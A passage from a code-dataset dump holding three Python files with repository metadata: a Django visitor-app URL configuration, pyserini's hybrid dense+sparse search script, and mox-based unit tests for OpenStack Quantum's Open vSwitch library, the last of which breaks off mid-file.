2daed747f68d04b1bda98bd51fe0876044e1cc54
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from django.urls import path
from django.contrib.auth import views as auth_views
from dashboard.views import index
from visitantes.views import registrar_visitante, informacoes_visitante, finalizar_visita
urlpatterns = [
path('admin/', admin.site.urls),
path('', index, name='index'),
path('registrar-visitante/', registrar_visitante, name='registrar_visitante'),
path('visitantes/<int:id>/', informacoes_visitante, name='informacoes_visitante'),
path('visitantes/<int:id>/finalizar-visita/', finalizar_visita, name='finalizar_visita'),
path('login/', auth_views.LoginView.as_view(template_name='login.html'), name='login'),
path('logout/', auth_views.LogoutView.as_view(template_name='logout.html'), name='logout'),
]
| 46
| 95
| 0.757033
|
from django.contrib import admin
from django.urls import path
from django.contrib.auth import views as auth_views
from dashboard.views import index
from visitantes.views import registrar_visitante, informacoes_visitante, finalizar_visita
urlpatterns = [
path('admin/', admin.site.urls),
path('', index, name='index'),
path('registrar-visitante/', registrar_visitante, name='registrar_visitante'),
path('visitantes/<int:id>/', informacoes_visitante, name='informacoes_visitante'),
path('visitantes/<int:id>/finalizar-visita/', finalizar_visita, name='finalizar_visita'),
path('login/', auth_views.LoginView.as_view(template_name='login.html'), name='login'),
path('logout/', auth_views.LogoutView.as_view(template_name='logout.html'), name='logout'),
]
| true
| true
|
790c756cda0990da4d1266cee7ef46ccdca9f80f
| 8,453
|
py
|
Python
|
pyserini/hsearch/__main__.py
|
leungjch/pyserini
|
04aa129910adf45266fe93a4d3947cdac2030570
|
[
"Apache-2.0"
] | null | null | null |
pyserini/hsearch/__main__.py
|
leungjch/pyserini
|
04aa129910adf45266fe93a4d3947cdac2030570
|
[
"Apache-2.0"
] | null | null | null |
pyserini/hsearch/__main__.py
|
leungjch/pyserini
|
04aa129910adf45266fe93a4d3947cdac2030570
|
[
"Apache-2.0"
] | null | null | null |
#
# Pyserini: Reproducible IR research with sparse and dense representations
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import argparse
import json
import os
import sys
from tqdm import tqdm
from pyserini.dsearch import SimpleDenseSearcher
from pyserini.query_iterator import get_query_iterator, TopicsFormat
from pyserini.output_writer import get_output_writer, OutputFormat
from pyserini.search import ImpactSearcher, SimpleSearcher
from pyserini.hsearch import HybridSearcher
from pyserini.dsearch.__main__ import define_dsearch_args, init_query_encoder
from pyserini.search.__main__ import define_search_args, set_bm25_parameters
# Fixes this error: "OMP: Error #15: Initializing libomp.a, but found libomp.dylib already initialized."
# https://stackoverflow.com/questions/53014306/error-15-initializing-libiomp5-dylib-but-found-libiomp5-dylib-already-initial
os.environ['KMP_DUPLICATE_LIB_OK'] = 'True'
def define_fusion_args(parser):
parser.add_argument('--alpha', type=float, metavar='num', required=False, default=0.1,
help="alpha for hybrid search")
parser.add_argument('--hits', type=int, required=False, default=10, help='number of hits from dense and sparse')
parser.add_argument('--normalization', action='store_true', required=False, help='hybrid score with normalization')
parser.add_argument('--weight-on-dense', action='store_true', required=False, help='weight on dense part')
def parse_args(parser, commands):
# Divide argv by commands
split_argv = [[]]
for c in sys.argv[1:]:
if c in commands.choices:
split_argv.append([c])
else:
split_argv[-1].append(c)
# Initialize namespace
args = argparse.Namespace()
for c in commands.choices:
setattr(args, c, None)
# Parse each command
parser.parse_args(split_argv[0], namespace=args) # Without command
for argv in split_argv[1:]: # Commands
n = argparse.Namespace()
setattr(args, argv[0], n)
parser.parse_args(argv, namespace=n)
return args
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Conduct a hybrid search on dense+sparse indexes.')
commands = parser.add_subparsers(title='sub-commands')
dense_parser = commands.add_parser('dense')
define_dsearch_args(dense_parser)
sparse_parser = commands.add_parser('sparse')
define_search_args(sparse_parser)
fusion_parser = commands.add_parser('fusion')
define_fusion_args(fusion_parser)
run_parser = commands.add_parser('run')
run_parser.add_argument('--topics', type=str, metavar='topic_name', required=False,
help="Name of topics. Available: msmarco-passage-dev-subset.")
run_parser.add_argument('--hits', type=int, metavar='num', required=False, default=1000, help="Number of hits.")
run_parser.add_argument('--topics-format', type=str, metavar='format', default=TopicsFormat.DEFAULT.value,
help=f"Format of topics. Available: {[x.value for x in list(TopicsFormat)]}")
run_parser.add_argument('--output-format', type=str, metavar='format', default=OutputFormat.TREC.value,
help=f"Format of output. Available: {[x.value for x in list(OutputFormat)]}")
run_parser.add_argument('--output', type=str, metavar='path', required=False, help="Path to output file.")
run_parser.add_argument('--max-passage', action='store_true',
default=False, help="Select only max passage from document.")
run_parser.add_argument('--max-passage-hits', type=int, metavar='num', required=False, default=100,
help="Final number of hits when selecting only max passage.")
run_parser.add_argument('--max-passage-delimiter', type=str, metavar='str', required=False, default='#',
help="Delimiter between docid and passage id.")
run_parser.add_argument('--batch-size', type=int, metavar='num', required=False,
default=1, help="Specify batch size to search the collection concurrently.")
run_parser.add_argument('--threads', type=int, metavar='num', required=False,
default=1, help="Maximum number of threads to use.")
args = parse_args(parser, commands)
query_iterator = get_query_iterator(args.run.topics, TopicsFormat(args.run.topics_format))
topics = query_iterator.topics
query_encoder = init_query_encoder(args.dense.encoder,
args.dense.tokenizer,
args.run.topics,
args.dense.encoded_queries,
args.dense.device,
args.dense.query_prefix)
if os.path.exists(args.dense.index):
# create searcher from index directory
dsearcher = SimpleDenseSearcher(args.dense.index, query_encoder)
else:
# create searcher from prebuilt index name
dsearcher = SimpleDenseSearcher.from_prebuilt_index(args.dense.index, query_encoder)
if not dsearcher:
exit()
if os.path.exists(args.sparse.index):
# create searcher from index directory
if args.sparse.impact:
ssearcher = ImpactSearcher(args.sparse.index, args.sparse.encoder, args.sparse.min_idf)
else:
ssearcher = SimpleSearcher(args.sparse.index)
else:
# create searcher from prebuilt index name
if args.sparse.impact:
ssearcher = ImpactSearcher.from_prebuilt_index(args.sparse.index, args.sparse.encoder, args.sparse.min_idf)
else:
ssearcher = SimpleSearcher.from_prebuilt_index(args.sparse.index)
if not ssearcher:
exit()
set_bm25_parameters(ssearcher, args.sparse.index, args.sparse.k1, args.sparse.b)
if args.sparse.language != 'en':
ssearcher.set_language(args.sparse.language)
hsearcher = HybridSearcher(dsearcher, ssearcher)
if not hsearcher:
exit()
# build output path
output_path = args.run.output
print(f'Running {args.run.topics} topics, saving to {output_path}...')
tag = 'hybrid'
output_writer = get_output_writer(output_path, OutputFormat(args.run.output_format), 'w',
max_hits=args.run.hits, tag=tag, topics=topics,
use_max_passage=args.run.max_passage,
max_passage_delimiter=args.run.max_passage_delimiter,
max_passage_hits=args.run.max_passage_hits)
with output_writer:
batch_topics = list()
batch_topic_ids = list()
for index, (topic_id, text) in enumerate(tqdm(query_iterator, total=len(topics.keys()))):
if args.run.batch_size <= 1 and args.run.threads <= 1:
hits = hsearcher.search(text, args.fusion.hits, args.run.hits, args.fusion.alpha, args.fusion.normalization, args.fusion.weight_on_dense)
results = [(topic_id, hits)]
else:
batch_topic_ids.append(str(topic_id))
batch_topics.append(text)
if (index + 1) % args.run.batch_size == 0 or \
index == len(topics.keys()) - 1:
results = hsearcher.batch_search(
batch_topics, batch_topic_ids, args.fusion.hits, args.run.hits, args.run.threads,
args.fusion.alpha, args.fusion.normalization, args.fusion.weight_on_dense)
results = [(id_, results[id_]) for id_ in batch_topic_ids]
batch_topic_ids.clear()
batch_topics.clear()
else:
continue
for topic, hits in results:
output_writer.write(topic, hits)
results.clear()
| 45.691892
| 153
| 0.655507
|
import argparse
import json
import os
import sys
from tqdm import tqdm
from pyserini.dsearch import SimpleDenseSearcher
from pyserini.query_iterator import get_query_iterator, TopicsFormat
from pyserini.output_writer import get_output_writer, OutputFormat
from pyserini.search import ImpactSearcher, SimpleSearcher
from pyserini.hsearch import HybridSearcher
from pyserini.dsearch.__main__ import define_dsearch_args, init_query_encoder
from pyserini.search.__main__ import define_search_args, set_bm25_parameters
os.environ['KMP_DUPLICATE_LIB_OK'] = 'True'
def define_fusion_args(parser):
parser.add_argument('--alpha', type=float, metavar='num', required=False, default=0.1,
help="alpha for hybrid search")
parser.add_argument('--hits', type=int, required=False, default=10, help='number of hits from dense and sparse')
parser.add_argument('--normalization', action='store_true', required=False, help='hybrid score with normalization')
parser.add_argument('--weight-on-dense', action='store_true', required=False, help='weight on dense part')
def parse_args(parser, commands):
split_argv = [[]]
for c in sys.argv[1:]:
if c in commands.choices:
split_argv.append([c])
else:
split_argv[-1].append(c)
args = argparse.Namespace()
for c in commands.choices:
setattr(args, c, None)
parser.parse_args(split_argv[0], namespace=args)
for argv in split_argv[1:]:
n = argparse.Namespace()
setattr(args, argv[0], n)
parser.parse_args(argv, namespace=n)
return args
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Conduct a hybrid search on dense+sparse indexes.')
commands = parser.add_subparsers(title='sub-commands')
dense_parser = commands.add_parser('dense')
define_dsearch_args(dense_parser)
sparse_parser = commands.add_parser('sparse')
define_search_args(sparse_parser)
fusion_parser = commands.add_parser('fusion')
define_fusion_args(fusion_parser)
run_parser = commands.add_parser('run')
run_parser.add_argument('--topics', type=str, metavar='topic_name', required=False,
help="Name of topics. Available: msmarco-passage-dev-subset.")
run_parser.add_argument('--hits', type=int, metavar='num', required=False, default=1000, help="Number of hits.")
run_parser.add_argument('--topics-format', type=str, metavar='format', default=TopicsFormat.DEFAULT.value,
help=f"Format of topics. Available: {[x.value for x in list(TopicsFormat)]}")
run_parser.add_argument('--output-format', type=str, metavar='format', default=OutputFormat.TREC.value,
help=f"Format of output. Available: {[x.value for x in list(OutputFormat)]}")
run_parser.add_argument('--output', type=str, metavar='path', required=False, help="Path to output file.")
run_parser.add_argument('--max-passage', action='store_true',
default=False, help="Select only max passage from document.")
run_parser.add_argument('--max-passage-hits', type=int, metavar='num', required=False, default=100,
help="Final number of hits when selecting only max passage.")
run_parser.add_argument('--max-passage-delimiter', type=str, metavar='str', required=False, default='#',
help="Delimiter between docid and passage id.")
run_parser.add_argument('--batch-size', type=int, metavar='num', required=False,
default=1, help="Specify batch size to search the collection concurrently.")
run_parser.add_argument('--threads', type=int, metavar='num', required=False,
default=1, help="Maximum number of threads to use.")
args = parse_args(parser, commands)
query_iterator = get_query_iterator(args.run.topics, TopicsFormat(args.run.topics_format))
topics = query_iterator.topics
query_encoder = init_query_encoder(args.dense.encoder,
args.dense.tokenizer,
args.run.topics,
args.dense.encoded_queries,
args.dense.device,
args.dense.query_prefix)
if os.path.exists(args.dense.index):
dsearcher = SimpleDenseSearcher(args.dense.index, query_encoder)
else:
dsearcher = SimpleDenseSearcher.from_prebuilt_index(args.dense.index, query_encoder)
if not dsearcher:
exit()
if os.path.exists(args.sparse.index):
if args.sparse.impact:
ssearcher = ImpactSearcher(args.sparse.index, args.sparse.encoder, args.sparse.min_idf)
else:
ssearcher = SimpleSearcher(args.sparse.index)
else:
if args.sparse.impact:
ssearcher = ImpactSearcher.from_prebuilt_index(args.sparse.index, args.sparse.encoder, args.sparse.min_idf)
else:
ssearcher = SimpleSearcher.from_prebuilt_index(args.sparse.index)
if not ssearcher:
exit()
set_bm25_parameters(ssearcher, args.sparse.index, args.sparse.k1, args.sparse.b)
if args.sparse.language != 'en':
ssearcher.set_language(args.sparse.language)
hsearcher = HybridSearcher(dsearcher, ssearcher)
if not hsearcher:
exit()
output_path = args.run.output
print(f'Running {args.run.topics} topics, saving to {output_path}...')
tag = 'hybrid'
output_writer = get_output_writer(output_path, OutputFormat(args.run.output_format), 'w',
max_hits=args.run.hits, tag=tag, topics=topics,
use_max_passage=args.run.max_passage,
max_passage_delimiter=args.run.max_passage_delimiter,
max_passage_hits=args.run.max_passage_hits)
with output_writer:
batch_topics = list()
batch_topic_ids = list()
for index, (topic_id, text) in enumerate(tqdm(query_iterator, total=len(topics.keys()))):
if args.run.batch_size <= 1 and args.run.threads <= 1:
hits = hsearcher.search(text, args.fusion.hits, args.run.hits, args.fusion.alpha, args.fusion.normalization, args.fusion.weight_on_dense)
results = [(topic_id, hits)]
else:
batch_topic_ids.append(str(topic_id))
batch_topics.append(text)
if (index + 1) % args.run.batch_size == 0 or \
index == len(topics.keys()) - 1:
results = hsearcher.batch_search(
batch_topics, batch_topic_ids, args.fusion.hits, args.run.hits, args.run.threads,
args.fusion.alpha, args.fusion.normalization, args.fusion.weight_on_dense)
results = [(id_, results[id_]) for id_ in batch_topic_ids]
batch_topic_ids.clear()
batch_topics.clear()
else:
continue
for topic, hits in results:
output_writer.write(topic, hits)
results.clear()
| true
| true
|
790c756cf18615f4e523d293f14c696d95a09f44
| 14,175
|
py
|
Python
|
quantum/tests/unit/openvswitch/test_ovs_lib.py
|
hyunsun/quantum
|
40c4ec9495d05620a3cced4cc2bb98d7f6e52bbb
|
[
"Apache-2.0"
] | 1
|
2021-04-18T15:23:19.000Z
|
2021-04-18T15:23:19.000Z
|
quantum/tests/unit/openvswitch/test_ovs_lib.py
|
hyunsun/quantum
|
40c4ec9495d05620a3cced4cc2bb98d7f6e52bbb
|
[
"Apache-2.0"
] | null | null | null |
quantum/tests/unit/openvswitch/test_ovs_lib.py
|
hyunsun/quantum
|
40c4ec9495d05620a3cced4cc2bb98d7f6e52bbb
|
[
"Apache-2.0"
] | null | null | null |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012, Nicira, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# @author: Dan Wendlandt, Nicira, Inc.
import mox
from quantum.agent.linux import ovs_lib, utils
from quantum.openstack.common import uuidutils
from quantum.tests import base
class OVS_Lib_Test(base.BaseTestCase):
"""
A test suite to excercise the OVS libraries shared by Quantum agents.
Note: these tests do not actually execute ovs-* utilities, and thus
can run on any system. That does, however, limit their scope.
"""
def setUp(self):
super(OVS_Lib_Test, self).setUp()
self.BR_NAME = "br-int"
self.TO = "--timeout=2"
self.mox = mox.Mox()
self.root_helper = 'sudo'
self.br = ovs_lib.OVSBridge(self.BR_NAME, self.root_helper)
self.mox.StubOutWithMock(utils, "execute")
self.addCleanup(self.mox.UnsetStubs)
def test_vifport(self):
"""create and stringify vif port, confirm no exceptions"""
self.mox.ReplayAll()
pname = "vif1.0"
ofport = 5
vif_id = uuidutils.generate_uuid()
mac = "ca:fe:de:ad:be:ef"
# test __init__
port = ovs_lib.VifPort(pname, ofport, vif_id, mac, self.br)
self.assertEqual(port.port_name, pname)
self.assertEqual(port.ofport, ofport)
self.assertEqual(port.vif_id, vif_id)
self.assertEqual(port.vif_mac, mac)
self.assertEqual(port.switch.br_name, self.BR_NAME)
# test __str__
foo = str(port)
self.mox.VerifyAll()
def test_reset_bridge(self):
utils.execute(["ovs-vsctl", self.TO, "--",
"--if-exists", "del-br", self.BR_NAME],
root_helper=self.root_helper)
utils.execute(["ovs-vsctl", self.TO, "add-br", self.BR_NAME],
root_helper=self.root_helper)
self.mox.ReplayAll()
self.br.reset_bridge()
self.mox.VerifyAll()
def test_delete_port(self):
pname = "tap5"
utils.execute(["ovs-vsctl", self.TO, "--", "--if-exists",
"del-port", self.BR_NAME, pname],
root_helper=self.root_helper)
self.mox.ReplayAll()
self.br.delete_port(pname)
self.mox.VerifyAll()
def test_add_flow(self):
ofport = "99"
vid = 4000
lsw_id = 18
utils.execute(["ovs-ofctl", "add-flow", self.BR_NAME,
"hard_timeout=0,idle_timeout=0,"
"priority=2,dl_src=ca:fe:de:ad:be:ef"
",actions=strip_vlan,output:0"],
root_helper=self.root_helper)
utils.execute(["ovs-ofctl", "add-flow", self.BR_NAME,
"hard_timeout=0,idle_timeout=0,"
"priority=1,actions=normal"],
root_helper=self.root_helper)
utils.execute(["ovs-ofctl", "add-flow", self.BR_NAME,
"hard_timeout=0,idle_timeout=0,"
"priority=2,actions=drop"],
root_helper=self.root_helper)
utils.execute(["ovs-ofctl", "add-flow", self.BR_NAME,
"hard_timeout=0,idle_timeout=0,"
"priority=2,in_port=%s,actions=drop" % ofport],
root_helper=self.root_helper)
utils.execute(["ovs-ofctl", "add-flow", self.BR_NAME,
"hard_timeout=0,idle_timeout=0,"
"priority=4,in_port=%s,dl_vlan=%s,"
"actions=strip_vlan,set_tunnel:%s,normal"
% (ofport, vid, lsw_id)],
root_helper=self.root_helper)
utils.execute(["ovs-ofctl", "add-flow", self.BR_NAME,
"hard_timeout=0,idle_timeout=0,"
"priority=3,tun_id=%s,actions="
"mod_vlan_vid:%s,output:%s"
% (lsw_id, vid, ofport)], root_helper=self.root_helper)
self.mox.ReplayAll()
self.br.add_flow(priority=2, dl_src="ca:fe:de:ad:be:ef",
actions="strip_vlan,output:0")
self.br.add_flow(priority=1, actions="normal")
self.br.add_flow(priority=2, actions="drop")
self.br.add_flow(priority=2, in_port=ofport, actions="drop")
self.br.add_flow(priority=4, in_port=ofport, dl_vlan=vid,
actions="strip_vlan,set_tunnel:%s,normal" %
(lsw_id))
self.br.add_flow(priority=3, tun_id=lsw_id,
actions="mod_vlan_vid:%s,output:%s" %
(vid, ofport))
self.mox.VerifyAll()
def test_get_port_ofport(self):
pname = "tap99"
ofport = "6"
utils.execute(["ovs-vsctl", self.TO, "get",
"Interface", pname, "ofport"],
root_helper=self.root_helper).AndReturn(ofport)
self.mox.ReplayAll()
self.assertEqual(self.br.get_port_ofport(pname), ofport)
self.mox.VerifyAll()
def test_get_datapath_id(self):
datapath_id = '"0000b67f4fbcc149"'
utils.execute(["ovs-vsctl", self.TO, "get",
"Bridge", self.BR_NAME, "datapath_id"],
root_helper=self.root_helper).AndReturn(datapath_id)
self.mox.ReplayAll()
self.assertEqual(self.br.get_datapath_id(), datapath_id.strip('"'))
self.mox.VerifyAll()
def test_count_flows(self):
utils.execute(["ovs-ofctl", "dump-flows", self.BR_NAME],
root_helper=self.root_helper).AndReturn('ignore'
'\nflow-1\n')
self.mox.ReplayAll()
# counts the number of flows as total lines of output - 2
self.assertEqual(self.br.count_flows(), 1)
self.mox.VerifyAll()
def test_delete_flow(self):
ofport = "5"
lsw_id = 40
vid = 39
utils.execute(["ovs-ofctl", "del-flows", self.BR_NAME,
"in_port=" + ofport], root_helper=self.root_helper)
utils.execute(["ovs-ofctl", "del-flows", self.BR_NAME,
"tun_id=%s" % lsw_id], root_helper=self.root_helper)
utils.execute(["ovs-ofctl", "del-flows", self.BR_NAME,
"dl_vlan=%s" % vid], root_helper=self.root_helper)
self.mox.ReplayAll()
self.br.delete_flows(in_port=ofport)
self.br.delete_flows(tun_id=lsw_id)
self.br.delete_flows(dl_vlan=vid)
self.mox.VerifyAll()
def test_add_tunnel_port(self):
pname = "tap99"
ip = "9.9.9.9"
ofport = "6"
utils.execute(["ovs-vsctl", self.TO, "add-port",
self.BR_NAME, pname], root_helper=self.root_helper)
utils.execute(["ovs-vsctl", self.TO, "set", "Interface",
pname, "type=gre"], root_helper=self.root_helper)
utils.execute(["ovs-vsctl", self.TO, "set", "Interface",
pname, "options:remote_ip=" + ip],
root_helper=self.root_helper)
utils.execute(["ovs-vsctl", self.TO, "set", "Interface",
pname, "options:in_key=flow"],
root_helper=self.root_helper)
utils.execute(["ovs-vsctl", self.TO, "set", "Interface",
pname, "options:out_key=flow"],
root_helper=self.root_helper)
utils.execute(["ovs-vsctl", self.TO, "get",
"Interface", pname, "ofport"],
root_helper=self.root_helper).AndReturn(ofport)
self.mox.ReplayAll()
self.assertEqual(self.br.add_tunnel_port(pname, ip), ofport)
self.mox.VerifyAll()
def test_add_patch_port(self):
pname = "tap99"
peer = "bar10"
ofport = "6"
utils.execute(["ovs-vsctl", self.TO, "add-port",
self.BR_NAME, pname], root_helper=self.root_helper)
utils.execute(["ovs-vsctl", self.TO, "set", "Interface",
pname, "type=patch"], root_helper=self.root_helper)
utils.execute(["ovs-vsctl", self.TO, "set",
"Interface", pname, "options:peer=" + peer],
root_helper=self.root_helper)
utils.execute(["ovs-vsctl", self.TO, "get",
"Interface", pname, "ofport"],
root_helper=self.root_helper).AndReturn(ofport)
self.mox.ReplayAll()
self.assertEqual(self.br.add_patch_port(pname, peer), ofport)
self.mox.VerifyAll()
def _test_get_vif_ports(self, is_xen=False):
pname = "tap99"
ofport = "6"
vif_id = uuidutils.generate_uuid()
mac = "ca:fe:de:ad:be:ef"
utils.execute(["ovs-vsctl", self.TO, "list-ports", self.BR_NAME],
root_helper=self.root_helper).AndReturn("%s\n" % pname)
if is_xen:
external_ids = ('{xs-vif-uuid="%s", attached-mac="%s"}'
% (vif_id, mac))
else:
external_ids = ('{iface-id="%s", attached-mac="%s"}'
% (vif_id, mac))
utils.execute(["ovs-vsctl", self.TO, "get",
"Interface", pname, "external_ids"],
root_helper=self.root_helper).AndReturn(external_ids)
utils.execute(["ovs-vsctl", self.TO, "get",
"Interface", pname, "ofport"],
root_helper=self.root_helper).AndReturn(ofport)
if is_xen:
utils.execute(["xe", "vif-param-get", "param-name=other-config",
"param-key=nicira-iface-id", "uuid=" + vif_id],
root_helper=self.root_helper).AndReturn(vif_id)
self.mox.ReplayAll()
ports = self.br.get_vif_ports()
self.assertEqual(1, len(ports))
self.assertEqual(ports[0].port_name, pname)
self.assertEqual(ports[0].ofport, ofport)
self.assertEqual(ports[0].vif_id, vif_id)
self.assertEqual(ports[0].vif_mac, mac)
self.assertEqual(ports[0].switch.br_name, self.BR_NAME)
self.mox.VerifyAll()
def test_get_vif_ports_nonxen(self):
self._test_get_vif_ports(False)
def test_get_vif_ports_xen(self):
self._test_get_vif_ports(True)
def test_clear_db_attribute(self):
pname = "tap77"
utils.execute(["ovs-vsctl", self.TO, "clear", "Port",
pname, "tag"], root_helper=self.root_helper)
self.mox.ReplayAll()
self.br.clear_db_attribute("Port", pname, "tag")
self.mox.VerifyAll()
def test_port_id_regex(self):
result = ('external_ids : {attached-mac="fa:16:3e:23:5b:f2",'
' iface-id="5c1321a7-c73f-4a77-95e6-9f86402e5c8f",'
' iface-status=active}\nname :'
' "dhc5c1321a7-c7"\nofport : 2\n')
match = self.br.re_id.search(result)
vif_mac = match.group('vif_mac')
vif_id = match.group('vif_id')
port_name = match.group('port_name')
ofport = int(match.group('ofport'))
self.assertEqual(vif_mac, 'fa:16:3e:23:5b:f2')
self.assertEqual(vif_id, '5c1321a7-c73f-4a77-95e6-9f86402e5c8f')
self.assertEqual(port_name, 'dhc5c1321a7-c7')
self.assertEqual(ofport, 2)
def test_iface_to_br(self):
iface = 'tap0'
br = 'br-int'
root_helper = 'sudo'
utils.execute(["ovs-vsctl", self.TO, "iface-to-br", iface],
root_helper=root_helper).AndReturn('br-int')
self.mox.ReplayAll()
self.assertEqual(ovs_lib.get_bridge_for_iface(root_helper, iface), br)
self.mox.VerifyAll()
def test_iface_to_br(self):
iface = 'tap0'
br = 'br-int'
root_helper = 'sudo'
utils.execute(["ovs-vsctl", self.TO, "iface-to-br", iface],
root_helper=root_helper).AndRaise(Exception)
self.mox.ReplayAll()
self.assertIsNone(ovs_lib.get_bridge_for_iface(root_helper, iface))
self.mox.VerifyAll()
def test_delete_all_ports(self):
self.mox.StubOutWithMock(self.br, 'get_port_name_list')
self.br.get_port_name_list().AndReturn(['port1'])
self.mox.StubOutWithMock(self.br, 'delete_port')
self.br.delete_port('port1')
self.mox.ReplayAll()
self.br.delete_ports(all_ports=True)
self.mox.VerifyAll()
def test_delete_quantum_ports(self):
port1 = ovs_lib.VifPort('tap1234', 1, uuidutils.generate_uuid(),
'ca:fe:de:ad:be:ef', 'br')
port2 = ovs_lib.VifPort('tap5678', 2, uuidutils.generate_uuid(),
'ca:ee:de:ad:be:ef', 'br')
ports = [port1, port2]
self.mox.StubOutWithMock(self.br, 'get_vif_ports')
self.br.get_vif_ports().AndReturn([port1, port2])
self.mox.StubOutWithMock(self.br, 'delete_port')
self.br.delete_port('tap1234')
self.br.delete_port('tap5678')
self.mox.ReplayAll()
self.br.delete_ports(all_ports=False)
self.mox.VerifyAll()
def test_get_bridges(self):
bridges = ['br-int', 'br-ex']
root_helper = 'sudo'
utils.execute(["ovs-vsctl", self.TO, "list-br"],
root_helper=root_helper).AndReturn('br-int\nbr-ex\n')
self.mox.ReplayAll()
self.assertEqual(ovs_lib.get_bridges(root_helper), bridges)
self.mox.VerifyAll()
| 40.616046
| 78
| 0.567478
|
import mox
from quantum.agent.linux import ovs_lib, utils
from quantum.openstack.common import uuidutils
from quantum.tests import base
class OVS_Lib_Test(base.BaseTestCase):
    """Unit tests for the ovs_lib OVSBridge shell-command wrapper.

    Every test stubs out utils.execute() with mox, records the exact
    ovs-vsctl / ovs-ofctl argument vectors the bridge helper is expected
    to run, then replays and verifies those expectations.
    """

    def setUp(self):
        super(OVS_Lib_Test, self).setUp()
        self.BR_NAME = "br-int"
        self.TO = "--timeout=2"
        self.mox = mox.Mox()
        self.root_helper = 'sudo'
        self.br = ovs_lib.OVSBridge(self.BR_NAME, self.root_helper)
        # All shell commands go through utils.execute; stub it so each
        # test asserts on the exact command lines issued.
        self.mox.StubOutWithMock(utils, "execute")
        self.addCleanup(self.mox.UnsetStubs)

    def test_vifport(self):
        """VifPort stores its constructor arguments unchanged."""
        self.mox.ReplayAll()
        pname = "vif1.0"
        ofport = 5
        vif_id = uuidutils.generate_uuid()
        mac = "ca:fe:de:ad:be:ef"
        port = ovs_lib.VifPort(pname, ofport, vif_id, mac, self.br)
        self.assertEqual(port.port_name, pname)
        self.assertEqual(port.ofport, ofport)
        self.assertEqual(port.vif_id, vif_id)
        self.assertEqual(port.vif_mac, mac)
        self.assertEqual(port.switch.br_name, self.BR_NAME)
        # the string representation must not raise
        str(port)
        self.mox.VerifyAll()

    def test_reset_bridge(self):
        """reset_bridge() removes the bridge (if any) then re-adds it."""
        utils.execute(["ovs-vsctl", self.TO, "--",
                       "--if-exists", "del-br", self.BR_NAME],
                      root_helper=self.root_helper)
        utils.execute(["ovs-vsctl", self.TO, "add-br", self.BR_NAME],
                      root_helper=self.root_helper)
        self.mox.ReplayAll()
        self.br.reset_bridge()
        self.mox.VerifyAll()

    def test_delete_port(self):
        """delete_port() issues an idempotent del-port command."""
        pname = "tap5"
        utils.execute(["ovs-vsctl", self.TO, "--", "--if-exists",
                       "del-port", self.BR_NAME, pname],
                      root_helper=self.root_helper)
        self.mox.ReplayAll()
        self.br.delete_port(pname)
        self.mox.VerifyAll()

    def test_add_flow(self):
        """add_flow() renders keyword arguments into ovs-ofctl flow specs."""
        ofport = "99"
        vid = 4000
        lsw_id = 18
        utils.execute(["ovs-ofctl", "add-flow", self.BR_NAME,
                       "hard_timeout=0,idle_timeout=0,"
                       "priority=2,dl_src=ca:fe:de:ad:be:ef"
                       ",actions=strip_vlan,output:0"],
                      root_helper=self.root_helper)
        utils.execute(["ovs-ofctl", "add-flow", self.BR_NAME,
                       "hard_timeout=0,idle_timeout=0,"
                       "priority=1,actions=normal"],
                      root_helper=self.root_helper)
        utils.execute(["ovs-ofctl", "add-flow", self.BR_NAME,
                       "hard_timeout=0,idle_timeout=0,"
                       "priority=2,actions=drop"],
                      root_helper=self.root_helper)
        utils.execute(["ovs-ofctl", "add-flow", self.BR_NAME,
                       "hard_timeout=0,idle_timeout=0,"
                       "priority=2,in_port=%s,actions=drop" % ofport],
                      root_helper=self.root_helper)
        utils.execute(["ovs-ofctl", "add-flow", self.BR_NAME,
                       "hard_timeout=0,idle_timeout=0,"
                       "priority=4,in_port=%s,dl_vlan=%s,"
                       "actions=strip_vlan,set_tunnel:%s,normal"
                       % (ofport, vid, lsw_id)],
                      root_helper=self.root_helper)
        utils.execute(["ovs-ofctl", "add-flow", self.BR_NAME,
                       "hard_timeout=0,idle_timeout=0,"
                       "priority=3,tun_id=%s,actions="
                       "mod_vlan_vid:%s,output:%s"
                       % (lsw_id, vid, ofport)], root_helper=self.root_helper)
        self.mox.ReplayAll()
        self.br.add_flow(priority=2, dl_src="ca:fe:de:ad:be:ef",
                         actions="strip_vlan,output:0")
        self.br.add_flow(priority=1, actions="normal")
        self.br.add_flow(priority=2, actions="drop")
        self.br.add_flow(priority=2, in_port=ofport, actions="drop")
        self.br.add_flow(priority=4, in_port=ofport, dl_vlan=vid,
                         actions="strip_vlan,set_tunnel:%s,normal" %
                         (lsw_id))
        self.br.add_flow(priority=3, tun_id=lsw_id,
                         actions="mod_vlan_vid:%s,output:%s" %
                         (vid, ofport))
        self.mox.VerifyAll()

    def test_get_port_ofport(self):
        """get_port_ofport() reads the Interface's ofport column."""
        pname = "tap99"
        ofport = "6"
        utils.execute(["ovs-vsctl", self.TO, "get",
                       "Interface", pname, "ofport"],
                      root_helper=self.root_helper).AndReturn(ofport)
        self.mox.ReplayAll()
        self.assertEqual(self.br.get_port_ofport(pname), ofport)
        self.mox.VerifyAll()

    def test_get_datapath_id(self):
        """get_datapath_id() strips the quotes ovs-vsctl adds."""
        datapath_id = '"0000b67f4fbcc149"'
        utils.execute(["ovs-vsctl", self.TO, "get",
                       "Bridge", self.BR_NAME, "datapath_id"],
                      root_helper=self.root_helper).AndReturn(datapath_id)
        self.mox.ReplayAll()
        self.assertEqual(self.br.get_datapath_id(), datapath_id.strip('"'))
        self.mox.VerifyAll()

    def test_count_flows(self):
        """count_flows() ignores the dump-flows header line."""
        utils.execute(["ovs-ofctl", "dump-flows", self.BR_NAME],
